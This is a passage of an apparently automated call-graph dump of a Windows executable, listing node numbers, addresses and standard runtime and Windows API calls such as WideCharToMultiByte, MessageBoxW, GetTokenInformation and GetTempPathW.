17024->17026 17027 7ff7b10f85c0 17025->17027 17028 7ff7b10f85dc WideCharToMultiByte 17025->17028 17026->17025 17029 7ff7b10f29c0 54 API calls 17027->17029 17030 7ff7b10f8616 17028->17030 17031 7ff7b10f85d3 17028->17031 17029->17031 17032 7ff7b10f29c0 54 API calls 17030->17032 17033 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17031->17033 17032->17031 17034 7ff7b10f2a3e 17033->17034 17034->16992 17036 7ff7b110336e 17035->17036 17037 7ff7b110335e 17035->17037 17038 7ff7b1103377 17036->17038 17042 7ff7b11033a5 17036->17042 17039 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17037->17039 17040 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17038->17040 17041 7ff7b110339d 17039->17041 17040->17041 17041->17012 17041->17017 17041->17020 17041->17021 17042->17037 17042->17041 17045 7ff7b1103654 17042->17045 17049 7ff7b1103cc0 17042->17049 17075 7ff7b1103988 17042->17075 17105 7ff7b1103210 17042->17105 17108 7ff7b1104ee0 17042->17108 17047 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17045->17047 17047->17037 17050 7ff7b1103d75 17049->17050 17051 7ff7b1103d02 17049->17051 17054 7ff7b1103dcf 17050->17054 17055 7ff7b1103d7a 17050->17055 17052 7ff7b1103d9f 17051->17052 17053 7ff7b1103d08 17051->17053 17132 7ff7b1102270 17052->17132 17056 7ff7b1103dde 17053->17056 17059 7ff7b1103d0d 17053->17059 17054->17052 17054->17056 17073 7ff7b1103d38 17054->17073 17057 7ff7b1103daf 17055->17057 17058 7ff7b1103d7c 17055->17058 17074 7ff7b1103e0d 17056->17074 17146 7ff7b1102680 17056->17146 17139 7ff7b1101e60 17057->17139 17063 7ff7b1103d8b 17058->17063 17066 7ff7b1103d1d 17058->17066 17064 7ff7b1103d50 17059->17064 17059->17066 17059->17073 17063->17052 17067 7ff7b1103d90 17063->17067 17064->17074 17124 7ff7b1104ae0 17064->17124 17066->17074 17114 7ff7b1104624 17066->17114 17067->17074 17128 7ff7b1104c78 17067->17128 17069 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17071 7ff7b11040a3 17069->17071 17071->17042 17073->17074 17153 7ff7b110f3f8 17073->17153 17074->17069 17076 7ff7b1103993 17075->17076 17077 7ff7b11039a9 17075->17077 17078 7ff7b11039e7 17076->17078 17080 7ff7b1103d75 17076->17080 17081 7ff7b1103d02 17076->17081 17077->17078 17079 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17077->17079 17078->17042 17079->17078 17084 7ff7b1103dcf 17080->17084 17085 7ff7b1103d7a 17080->17085 17082 7ff7b1103d9f 17081->17082 17083 7ff7b1103d08 17081->17083 17086 7ff7b1102270 38 API calls 17082->17086 17087 7ff7b1103d0d 17083->17087 17090 7ff7b1103dde 17083->17090 17084->17082 17084->17090 17103 7ff7b1103d38 17084->17103 17088 7ff7b1103daf 17085->17088 17091 7ff7b1103d7c 17085->17091 17086->17103 17093 7ff7b1103d50 17087->17093 17096 7ff7b1103d1d 17087->17096 17087->17103 17092 7ff7b1101e60 38 API calls 17088->17092 17089 7ff7b1104624 47 API calls 17089->17103 17094 7ff7b1102680 38 API calls 17090->17094 17104 7ff7b1103e0d 17090->17104 17095 7ff7b1103d8b 17091->17095 17091->17096 17092->17103 17097 7ff7b1104ae0 47 API calls 17093->17097 17093->17104 17094->17103 17095->17082 17098 7ff7b1103d90 17095->17098 17096->17089 17096->17104 17097->17103 17100 7ff7b1104c78 37 API calls 17098->17100 17098->17104 17099 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17101 7ff7b11040a3 17099->17101 17100->17103 17101->17042 17102 7ff7b110f3f8 47 API calls 17102->17103 17103->17102 17103->17104 17104->17099 17302 7ff7b1101434 17105->17302 17109 7ff7b1104ef7 17108->17109 17319 7ff7b110e558 17109->17319 17115 7ff7b1104646 17114->17115 17163 7ff7b11012a0 17115->17163 17120 7ff7b1104783 17122 7ff7b1104ee0 45 API calls 17120->17122 17123 7ff7b110480c 17120->17123 17121 7ff7b1104ee0 45 API calls 17121->17120 17122->17123 17123->17073 17125 7ff7b1104af8 17124->17125 17127 7ff7b1104b60 17124->17127 17126 7ff7b110f3f8 47 API calls 17125->17126 17125->17127 17126->17127 17127->17073 17131 7ff7b1104c99 17128->17131 17129 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17130 7ff7b1104cca 17129->17130 17130->17073 17131->17129 17131->17130 17134 7ff7b11022a3 17132->17134 17133 7ff7b11022d2 17135 7ff7b11012a0 12 API calls 17133->17135 17138 7ff7b110230f 17133->17138 17134->17133 17136 7ff7b110238f 17134->17136 17135->17138 17137 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17136->17137 17137->17138 17138->17073 17140 7ff7b1101e93 17139->17140 17141 7ff7b1101ec2 17140->17141 17143 7ff7b1101f7f 17140->17143 17142 7ff7b11012a0 12 API calls 17141->17142 17145 7ff7b1101eff 17141->17145 17142->17145 17144 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17143->17144 17144->17145 17145->17073 17147 7ff7b11026b3 17146->17147 17148 7ff7b11026e2 17147->17148 17150 7ff7b110279f 17147->17150 17149 7ff7b11012a0 12 API calls 17148->17149 17152 7ff7b110271f 17148->17152 17149->17152 17151 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17150->17151 17151->17152 17152->17073 17154 7ff7b110f420 17153->17154 17155 7ff7b110f465 17154->17155 17156 7ff7b1104ee0 45 API calls 17154->17156 17159 7ff7b110f425 memcpy_s 17154->17159 17162 7ff7b110f44e memcpy_s 17154->17162 17155->17159 17155->17162 17299 7ff7b1110aa8 17155->17299 17156->17155 17157 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17157->17159 17159->17073 17162->17157 17162->17159 17164 7ff7b11012d7 17163->17164 17165 7ff7b11012c6 17163->17165 17164->17165 17166 7ff7b110e19c _fread_nolock 12 API calls 17164->17166 17171 7ff7b110f110 17165->17171 17167 7ff7b1101304 17166->17167 17168 7ff7b1101318 17167->17168 17169 7ff7b110b4ec __free_lconv_num 11 API calls 17167->17169 17170 7ff7b110b4ec __free_lconv_num 11 API calls 17168->17170 17169->17168 17170->17165 17172 7ff7b110f12d 17171->17172 17173 7ff7b110f160 17171->17173 17174 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17172->17174 17173->17172 17175 7ff7b110f192 17173->17175 17184 7ff7b1104761 17174->17184 17182 7ff7b110f2a5 17175->17182 17188 7ff7b110f1da 17175->17188 17176 7ff7b110f397 17226 7ff7b110e5fc 17176->17226 17178 7ff7b110f35d 17219 7ff7b110e994 17178->17219 17180 7ff7b110f32c 17212 7ff7b110ec74 17180->17212 17182->17176 17182->17178 17182->17180 17183 7ff7b110f2ef 17182->17183 17186 7ff7b110f2e5 17182->17186 17202 7ff7b110eea4 17183->17202 17184->17120 17184->17121 17186->17178 17187 7ff7b110f2ea 17186->17187 17187->17180 17187->17183 17188->17184 17193 7ff7b110b01c 17188->17193 17191 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17192 7ff7b110f3f4 17191->17192 17195 7ff7b110b029 17193->17195 17197 7ff7b110b033 17193->17197 17194 7ff7b1105aa4 _get_daylight 11 API calls 17196 7ff7b110b03a 17194->17196 17195->17197 17200 7ff7b110b04e 17195->17200 17198 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17196->17198 17197->17194 17199 7ff7b110b046 17198->17199 17199->17184 17199->17191 17200->17199 17201 7ff7b1105aa4 _get_daylight 11 API calls 17200->17201 17201->17196 17235 7ff7b1114cfc 17202->17235 17206 7ff7b110ef4c 17207 7ff7b110efa1 17206->17207 17209 7ff7b110ef6c 17206->17209 17211 7ff7b110ef50 17206->17211 17288 7ff7b110ea90 17207->17288 17284 7ff7b110ed4c 17209->17284 17211->17184 17213 7ff7b1114cfc 38 API calls 17212->17213 17214 7ff7b110ecbe 17213->17214 17215 7ff7b1114744 37 API calls 17214->17215 17216 7ff7b110ed0e 17215->17216 17217 7ff7b110ed12 17216->17217 17218 7ff7b110ed4c 45 API calls 17216->17218 17217->17184 17218->17217 17220 7ff7b1114cfc 38 API calls 17219->17220 17221 7ff7b110e9df 17220->17221 17222 7ff7b1114744 37 API calls 17221->17222 17223 7ff7b110ea37 17222->17223 17224 7ff7b110ea3b 17223->17224 17225 7ff7b110ea90 45 API calls 17223->17225 17224->17184 17225->17224 17227 7ff7b110e641 17226->17227 17228 7ff7b110e674 17226->17228 17229 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17227->17229 17230 7ff7b110e68c 17228->17230 17232 7ff7b110e70d 17228->17232 17234 7ff7b110e66d memcpy_s 17229->17234 17231 7ff7b110e994 46 API calls 17230->17231 17231->17234 17233 7ff7b1104ee0 45 API calls 17232->17233 17232->17234 17233->17234 17234->17184 17236 7ff7b1114d4f fegetenv 17235->17236 17237 7ff7b1118c5c 37 API calls 17236->17237 17241 7ff7b1114da2 17237->17241 17238 7ff7b1114e92 17240 7ff7b1118c5c 37 API calls 17238->17240 17239 7ff7b1114dcf 17243 7ff7b110b01c __std_exception_copy 37 API calls 17239->17243 17242 7ff7b1114ebc 17240->17242 17241->17238 17244 7ff7b1114dbd 17241->17244 17245 7ff7b1114e6c 17241->17245 17246 7ff7b1118c5c 37 API calls 17242->17246 17247 7ff7b1114e4d 17243->17247 17244->17238 17244->17239 17249 7ff7b110b01c __std_exception_copy 37 API calls 17245->17249 17250 7ff7b1114ecd 17246->17250 17248 7ff7b1115f74 17247->17248 17255 7ff7b1114e55 17247->17255 17251 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17248->17251 17249->17247 17252 7ff7b1118e50 20 API calls 17250->17252 17253 7ff7b1115f89 17251->17253 17262 7ff7b1114f36 memcpy_s 17252->17262 17254 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17256 7ff7b110eef1 17254->17256 17255->17254 17280 7ff7b1114744 17256->17280 17257 7ff7b11152df memcpy_s 17258 7ff7b1114f77 memcpy_s 17266 7ff7b11158bb memcpy_s 17258->17266 17267 7ff7b11153d3 memcpy_s 17258->17267 17259 7ff7b111561f 17260 7ff7b1114860 37 API calls 17259->17260 17269 7ff7b1115d37 17260->17269 17261 7ff7b11155cb 17261->17259 17264 7ff7b1115f8c memcpy_s 37 API calls 17261->17264 17262->17257 17262->17258 17265 7ff7b1105aa4 _get_daylight 11 API calls 17262->17265 17263 7ff7b1115d92 17271 7ff7b1115f18 17263->17271 17276 7ff7b1114860 37 API calls 17263->17276 17278 7ff7b1115f8c memcpy_s 37 API calls 17263->17278 17264->17259 17268 7ff7b11153b0 17265->17268 17266->17259 17266->17261 17273 7ff7b1105aa4 11 API calls _get_daylight 17266->17273 17279 7ff7b110b484 37 API calls _invalid_parameter_noinfo 17266->17279 17267->17261 17274 7ff7b1105aa4 11 API calls _get_daylight 17267->17274 17277 7ff7b110b484 37 API calls _invalid_parameter_noinfo 17267->17277 17270 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17268->17270 17269->17263 17272 7ff7b1115f8c memcpy_s 37 API calls 17269->17272 17270->17258 17275 7ff7b1118c5c 37 API calls 17271->17275 17272->17263 17273->17266 17274->17267 17275->17255 17276->17263 17277->17267 17278->17263 17279->17266 17281 7ff7b1114763 17280->17281 17282 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17281->17282 17283 7ff7b111478e memcpy_s 17281->17283 17282->17283 17283->17206 17286 7ff7b110ed78 memcpy_s 17284->17286 17285 7ff7b110ee32 memcpy_s 17285->17211 17286->17285 17287 7ff7b1104ee0 45 API calls 17286->17287 17287->17285 17289 7ff7b110eacb 17288->17289 17293 7ff7b110eb18 memcpy_s 17288->17293 17290 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17289->17290 17291 7ff7b110eaf7 17290->17291 17291->17211 17292 7ff7b110eb83 17294 7ff7b110b01c __std_exception_copy 37 API calls 17292->17294 17293->17292 17295 7ff7b1104ee0 45 API calls 17293->17295 17298 7ff7b110ebc5 memcpy_s 17294->17298 17295->17292 17296 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17297 7ff7b110ec70 17296->17297 17298->17296 17301 7ff7b1110acc WideCharToMultiByte 17299->17301 17303 7ff7b1101473 17302->17303 17304 7ff7b1101461 17302->17304 17307 7ff7b1101480 17303->17307 17310 7ff7b11014bd 17303->17310 17305 7ff7b1105aa4 _get_daylight 11 API calls 17304->17305 17306 7ff7b1101466 17305->17306 17308 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17306->17308 17309 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17307->17309 17316 7ff7b1101471 17308->17316 17309->17316 17311 7ff7b1101566 17310->17311 17313 7ff7b1105aa4 _get_daylight 11 API calls 17310->17313 17312 7ff7b1105aa4 _get_daylight 11 API calls 17311->17312 17311->17316 17315 7ff7b1101610 17312->17315 17314 7ff7b110155b 17313->17314 17317 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17314->17317 17318 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17315->17318 17316->17042 17317->17311 17318->17316 17320 7ff7b1104f1f 17319->17320 17321 7ff7b110e571 17319->17321 17323 7ff7b110e5c4 17320->17323 17321->17320 17327 7ff7b1113f54 17321->17327 17324 7ff7b110e5dd 17323->17324 17326 7ff7b1104f2f 17323->17326 17324->17326 17340 7ff7b11132a0 17324->17340 17326->17042 17328 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17327->17328 17329 7ff7b1113f63 17328->17329 17330 7ff7b1113fae 17329->17330 17339 7ff7b1111298 EnterCriticalSection 17329->17339 17330->17320 17341 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17340->17341 17342 7ff7b11132a9 17341->17342 17350 7ff7b110594c EnterCriticalSection 17343->17350 17352 7ff7b10f288c 17351->17352 17353 7ff7b11050a4 49 API calls 17352->17353 17354 7ff7b10f28dd 17353->17354 17355 7ff7b1105aa4 _get_daylight 11 API calls 17354->17355 17356 7ff7b10f28e2 17355->17356 17370 7ff7b1105ac4 17356->17370 17359 7ff7b10f1ee0 49 API calls 17360 7ff7b10f2911 memcpy_s 17359->17360 17361 7ff7b10f8bd0 57 API calls 17360->17361 17362 7ff7b10f2946 17361->17362 17363 7ff7b10f2983 MessageBoxA 17362->17363 17364 7ff7b10f294b 17362->17364 17366 7ff7b10f299d 17363->17366 17365 7ff7b10f8bd0 57 API calls 17364->17365 17367 7ff7b10f2965 MessageBoxW 17365->17367 17368 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17366->17368 17367->17366 17369 7ff7b10f29ad 17368->17369 17369->16713 17371 7ff7b110be68 _get_daylight 11 API calls 17370->17371 17372 7ff7b1105adb 17371->17372 17373 7ff7b10f28e9 17372->17373 17374 7ff7b110f738 _get_daylight 11 API calls 17372->17374 17376 7ff7b1105b1b 17372->17376 17373->17359 17375 7ff7b1105b10 17374->17375 17377 7ff7b110b4ec __free_lconv_num 11 API calls 17375->17377 17376->17373 17382 7ff7b110fe08 17376->17382 17377->17376 17380 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17381 7ff7b1105b60 17380->17381 17387 7ff7b110fe25 17382->17387 17383 7ff7b110fe2a 17384 7ff7b1105b41 17383->17384 17385 7ff7b1105aa4 _get_daylight 11 API calls 17383->17385 17384->17373 17384->17380 17386 7ff7b110fe34 17385->17386 17388 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17386->17388 17387->17383 17387->17384 17389 7ff7b110fe74 17387->17389 17388->17384 17389->17384 17390 7ff7b1105aa4 _get_daylight 11 API calls 17389->17390 17390->17386 17392 7ff7b10f8d04 WideCharToMultiByte 17391->17392 17393 7ff7b10f8d72 WideCharToMultiByte 17391->17393 17396 7ff7b10f8d45 17392->17396 17397 7ff7b10f8d2e 17392->17397 17394 7ff7b10f3f15 17393->17394 17395 7ff7b10f8d9f 17393->17395 17394->16722 17394->16724 17398 7ff7b10f29c0 57 API calls 17395->17398 17396->17393 17400 7ff7b10f8d5b 17396->17400 17399 7ff7b10f29c0 57 API calls 17397->17399 17398->17394 17399->17394 17401 7ff7b10f29c0 57 API calls 17400->17401 17401->17394 17403 7ff7b10f7bde 17402->17403 17404 7ff7b110af93 17402->17404 17403->16740 17404->17403 17405 7ff7b110b01c __std_exception_copy 37 API calls 17404->17405 17406 7ff7b110afc0 17405->17406 17406->17403 17407 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17406->17407 17408 7ff7b110aff0 17407->17408 17410 7ff7b10f3fc0 116 API calls 17409->17410 17411 7ff7b10f1ac6 17410->17411 17412 7ff7b10f82b0 83 API calls 17411->17412 17419 7ff7b10f1c74 17411->17419 17414 7ff7b10f1afe 17412->17414 17413 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17415 7ff7b10f1c88 17413->17415 17441 7ff7b10f1b2f 17414->17441 17448 7ff7b1100df4 17414->17448 17415->16760 17442 7ff7b10f3e30 17415->17442 17417 7ff7b110076c 74 API calls 17417->17419 17418 7ff7b10f1b18 17420 7ff7b10f1b34 17418->17420 17421 7ff7b10f1b1c 17418->17421 17419->17413 17452 7ff7b1100abc 17420->17452 17422 7ff7b10f2870 59 API calls 17421->17422 17422->17441 17425 7ff7b10f1b4f 17428 7ff7b10f2870 59 API calls 17425->17428 17426 7ff7b10f1b67 17427 7ff7b1100df4 73 API calls 17426->17427 17429 7ff7b10f1bb4 17427->17429 17428->17441 17430 7ff7b10f1bc6 17429->17430 17431 7ff7b10f1bde 17429->17431 17432 7ff7b10f2870 59 API calls 17430->17432 17433 7ff7b1100abc _fread_nolock 53 API calls 17431->17433 17432->17441 17434 7ff7b10f1bf3 17433->17434 17435 7ff7b10f1c0e 17434->17435 17436 7ff7b10f1bf9 17434->17436 17455 7ff7b1100830 17435->17455 17438 7ff7b10f2870 59 API calls 17436->17438 17438->17441 17440 7ff7b10f2b10 59 API calls 17440->17441 17441->17417 17443 7ff7b10f1ee0 49 API calls 17442->17443 17444 7ff7b10f3e4d 17443->17444 17444->16759 17446 7ff7b10f1ee0 49 API calls 17445->17446 17447 7ff7b10f4070 17446->17447 17447->16760 17449 7ff7b1100e24 17448->17449 17461 7ff7b1100b84 17449->17461 17451 7ff7b1100e3d 17451->17418 17473 7ff7b1100adc 17452->17473 17456 7ff7b1100839 17455->17456 17457 7ff7b10f1c22 17455->17457 17458 7ff7b1105aa4 _get_daylight 11 API calls 17456->17458 17457->17440 17457->17441 17459 7ff7b110083e 17458->17459 17460 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17459->17460 17460->17457 17462 7ff7b1100bee 17461->17462 17463 7ff7b1100bae 17461->17463 17462->17463 17465 7ff7b1100bfa 17462->17465 17464 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17463->17464 17471 7ff7b1100bd5 17464->17471 17472 7ff7b110594c EnterCriticalSection 17465->17472 17471->17451 17474 7ff7b1100b06 17473->17474 17485 7ff7b10f1b49 17473->17485 17475 7ff7b1100b15 memcpy_s 17474->17475 17476 7ff7b1100b52 17474->17476 17474->17485 17478 7ff7b1105aa4 _get_daylight 11 API calls 17475->17478 17486 7ff7b110594c EnterCriticalSection 17476->17486 17480 7ff7b1100b2a 17478->17480 17482 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17480->17482 17482->17485 17485->17425 17485->17426 17488 7ff7b10f868f GetTokenInformation 17487->17488 17491 7ff7b10f8711 __std_exception_copy 17487->17491 17489 7ff7b10f86b0 GetLastError 17488->17489 17490 7ff7b10f86bb 17488->17490 17489->17490 17489->17491 17490->17491 17494 7ff7b10f86d7 GetTokenInformation 17490->17494 17492 7ff7b10f8724 CloseHandle 17491->17492 17493 7ff7b10f872a 17491->17493 17492->17493 17493->16769 17494->17491 17495 7ff7b10f86fa 17494->17495 17495->17491 17496 7ff7b10f8704 ConvertSidToStringSidW 17495->17496 17496->17491 17498 7ff7b10f8765 17497->17498 17514 7ff7b11052f8 17498->17514 17502 7ff7b10f2c50 17501->17502 17503 7ff7b11050a4 49 API calls 17502->17503 17504 7ff7b10f2c9b memcpy_s 17503->17504 17505 7ff7b10f8bd0 57 API calls 17504->17505 17506 7ff7b10f2cd0 17505->17506 17507 7ff7b10f2cd5 17506->17507 17508 7ff7b10f2d0d MessageBoxA 17506->17508 17510 7ff7b10f8bd0 57 API calls 17507->17510 17509 7ff7b10f2d27 17508->17509 17512 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17509->17512 17511 7ff7b10f2cef MessageBoxW 17510->17511 17511->17509 17513 7ff7b10f2d37 17512->17513 17513->16779 17515 7ff7b1105352 17514->17515 17516 7ff7b1105377 17515->17516 17518 7ff7b11053b3 17515->17518 17517 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17516->17517 17521 7ff7b11053a1 17517->17521 17532 7ff7b11036b0 17518->17532 17520 7ff7b1105494 17523 7ff7b110b4ec __free_lconv_num 11 API calls 17520->17523 17522 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17521->17522 17525 7ff7b10f8788 17522->17525 17523->17521 17525->16776 17526 7ff7b11054ba 17526->17520 17529 7ff7b11054c4 17526->17529 17527 7ff7b1105469 17530 7ff7b110b4ec __free_lconv_num 11 API calls 17527->17530 17528 7ff7b1105460 17528->17520 17528->17527 17531 7ff7b110b4ec __free_lconv_num 11 API calls 17529->17531 17530->17521 17531->17521 17533 7ff7b11036ee 17532->17533 17534 7ff7b11036de 17532->17534 17535 7ff7b11036f7 17533->17535 17539 7ff7b1103725 17533->17539 17536 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17534->17536 17537 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17535->17537 17538 7ff7b110371d 17536->17538 17537->17538 17538->17520 17538->17526 17538->17527 17538->17528 17539->17534 17539->17538 17543 7ff7b11040c4 17539->17543 17576 7ff7b1103b10 17539->17576 17613 7ff7b11032a0 17539->17613 17544 7ff7b1104106 17543->17544 17545 7ff7b1104177 17543->17545 17546 7ff7b11041a1 17544->17546 17547 7ff7b110410c 17544->17547 17548 7ff7b11041d0 17545->17548 17549 7ff7b110417c 17545->17549 17632 7ff7b1102474 17546->17632 17550 7ff7b1104111 17547->17550 17551 7ff7b1104140 17547->17551 17554 7ff7b11041df 17548->17554 17556 7ff7b11041e7 17548->17556 17557 7ff7b11041da 17548->17557 17552 7ff7b11041b1 17549->17552 17553 7ff7b110417e 17549->17553 17550->17556 17558 7ff7b1104117 17550->17558 17551->17554 17551->17558 17639 7ff7b1102064 17552->17639 17563 7ff7b1104120 17553->17563 17565 7ff7b110418d 17553->17565 17574 7ff7b1104210 17554->17574 17650 7ff7b1102884 17554->17650 17646 7ff7b1104dcc 17556->17646 17557->17546 17557->17554 17558->17563 17564 7ff7b1104152 17558->17564 17572 7ff7b110413b 17558->17572 17563->17574 17616 7ff7b1104878 17563->17616 17564->17574 17626 7ff7b1104bb4 17564->17626 17565->17546 17567 7ff7b1104192 17565->17567 17570 7ff7b1104c78 37 API calls 17567->17570 17567->17574 17568 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17569 7ff7b110450a 17568->17569 17569->17539 17570->17572 17571 7ff7b1104ee0 45 API calls 17575 7ff7b11043fc 17571->17575 17572->17571 17572->17574 17572->17575 17574->17568 17575->17574 17657 7ff7b110f5a8 17575->17657 17577 7ff7b1103b34 17576->17577 17578 7ff7b1103b1e 17576->17578 17579 7ff7b1103b74 17577->17579 17582 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17577->17582 17578->17579 17580 7ff7b1104106 17578->17580 17581 7ff7b1104177 17578->17581 17579->17539 17583 7ff7b11041a1 17580->17583 17584 7ff7b110410c 17580->17584 17585 7ff7b11041d0 17581->17585 17586 7ff7b110417c 17581->17586 17582->17579 17591 7ff7b1102474 38 API calls 17583->17591 17587 7ff7b1104111 17584->17587 17588 7ff7b1104140 17584->17588 17592 7ff7b11041e7 17585->17592 17594 7ff7b11041da 17585->17594 17598 7ff7b11041df 17585->17598 17589 7ff7b11041b1 17586->17589 17590 7ff7b110417e 17586->17590 17587->17592 17595 7ff7b1104117 17587->17595 17588->17595 17588->17598 17596 7ff7b1102064 38 API calls 17589->17596 17593 7ff7b1104120 17590->17593 17602 7ff7b110418d 17590->17602 17609 7ff7b110413b 17591->17609 17599 7ff7b1104dcc 45 API calls 17592->17599 17597 7ff7b1104878 47 API calls 17593->17597 17612 7ff7b1104210 17593->17612 17594->17583 17594->17598 17595->17593 17600 7ff7b1104152 17595->17600 17595->17609 17596->17609 17597->17609 17601 7ff7b1102884 38 API calls 17598->17601 17598->17612 17599->17609 17603 7ff7b1104bb4 46 API calls 17600->17603 17600->17612 17601->17609 17602->17583 17604 7ff7b1104192 17602->17604 17603->17609 17607 7ff7b1104c78 37 API calls 17604->17607 17604->17612 17605 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17606 7ff7b110450a 17605->17606 17606->17539 17607->17609 17608 7ff7b1104ee0 45 API calls 17611 7ff7b11043fc 17608->17611 17609->17608 17609->17611 17609->17612 17610 7ff7b110f5a8 46 API calls 17610->17611 17611->17610 17611->17612 17612->17605 17691 7ff7b11016e8 17613->17691 17617 7ff7b110489e 17616->17617 17618 7ff7b11012a0 12 API calls 17617->17618 17619 7ff7b11048ee 17618->17619 17620 7ff7b110f110 46 API calls 17619->17620 17621 7ff7b11049c1 17620->17621 17622 7ff7b1104ee0 45 API calls 17621->17622 17623 7ff7b11049e3 17621->17623 17622->17623 17624 7ff7b1104ee0 45 API calls 17623->17624 17625 7ff7b1104a71 17623->17625 17624->17625 17625->17572 17628 7ff7b1104be9 17626->17628 17627 7ff7b1104c2e 17627->17572 17628->17627 17629 7ff7b1104c07 17628->17629 17630 7ff7b1104ee0 45 API calls 17628->17630 17631 7ff7b110f5a8 46 API calls 17629->17631 17630->17629 17631->17627 17633 7ff7b11024a7 17632->17633 17634 7ff7b11024d6 17633->17634 17636 7ff7b1102593 17633->17636 17638 7ff7b1102513 17634->17638 17669 7ff7b1101348 17634->17669 17637 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17636->17637 17637->17638 17638->17572 17640 7ff7b1102097 17639->17640 17641 7ff7b11020c6 17640->17641 17643 7ff7b1102183 17640->17643 17642 7ff7b1101348 12 API calls 17641->17642 17645 7ff7b1102103 17641->17645 17642->17645 17644 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17643->17644 17644->17645 17645->17572 17647 7ff7b1104e0f 17646->17647 17649 7ff7b1104e13 __crtLCMapStringW 17647->17649 17677 7ff7b1104e68 17647->17677 17649->17572 17651 7ff7b11028b7 17650->17651 17652 7ff7b11028e6 17651->17652 17655 7ff7b11029a3 17651->17655 17653 7ff7b1102923 17652->17653 17654 7ff7b1101348 12 API calls 17652->17654 17653->17572 17654->17653 17656 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17655->17656 17656->17653 17659 7ff7b110f5d9 17657->17659 17666 7ff7b110f5e7 17657->17666 17658 7ff7b110f607 17661 7ff7b110f618 17658->17661 17662 7ff7b110f63f 17658->17662 17659->17658 17660 7ff7b1104ee0 45 API calls 17659->17660 17659->17666 17660->17658 17681 7ff7b1111060 17661->17681 17664 7ff7b110f669 17662->17664 17665 7ff7b110f6ca 17662->17665 17662->17666 17664->17666 17684 7ff7b11101e0 17664->17684 17667 7ff7b11101e0 _fread_nolock MultiByteToWideChar 17665->17667 17666->17575 17667->17666 17670 7ff7b110137f 17669->17670 17675 7ff7b110136e 17669->17675 17671 7ff7b110e19c _fread_nolock 12 API calls 17670->17671 17670->17675 17672 7ff7b11013b0 17671->17672 17674 7ff7b110b4ec __free_lconv_num 11 API calls 17672->17674 17676 7ff7b11013c4 17672->17676 17673 7ff7b110b4ec __free_lconv_num 11 API calls 17673->17675 17674->17676 17675->17638 17676->17673 17678 7ff7b1104e86 17677->17678 17679 7ff7b1104e8e 17677->17679 17680 7ff7b1104ee0 45 API calls 17678->17680 17679->17649 17680->17679 17687 7ff7b1117cc0 17681->17687 17686 7ff7b11101e9 MultiByteToWideChar 17684->17686 17690 7ff7b1117d24 17687->17690 17688 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17689 7ff7b111107d 17688->17689 17689->17666 17690->17688 17692 7ff7b110172f 17691->17692 17693 7ff7b110171d 17691->17693 17696 7ff7b110173d 17692->17696 17700 7ff7b1101779 17692->17700 17694 7ff7b1105aa4 _get_daylight 11 API calls 17693->17694 17695 7ff7b1101722 17694->17695 17697 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17695->17697 17698 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17696->17698 17705 7ff7b110172d 17697->17705 17698->17705 17699 7ff7b1101af5 17701 7ff7b1105aa4 _get_daylight 11 API calls 17699->17701 17699->17705 17700->17699 17702 7ff7b1105aa4 _get_daylight 11 API calls 17700->17702 17703 7ff7b1101d89 17701->17703 17704 7ff7b1101aea 17702->17704 17706 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17703->17706 17707 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17704->17707 17705->17539 17706->17705 17707->17699 17709 7ff7b10f7966 17708->17709 17710 7ff7b10f79dd GetTempPathW 17709->17710 17711 7ff7b10f798a 17709->17711 17713 7ff7b10f79f2 17710->17713 17712 7ff7b10f7b60 61 API calls 17711->17712 17714 7ff7b10f7996 17712->17714 17747 7ff7b10f2810 17713->17747 17759 7ff7b10f7420 17714->17759 17720 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17723 7ff7b10f153f 17720->17723 17721 7ff7b10f7a0b __std_exception_copy 17725 7ff7b10f7ab6 17721->17725 17730 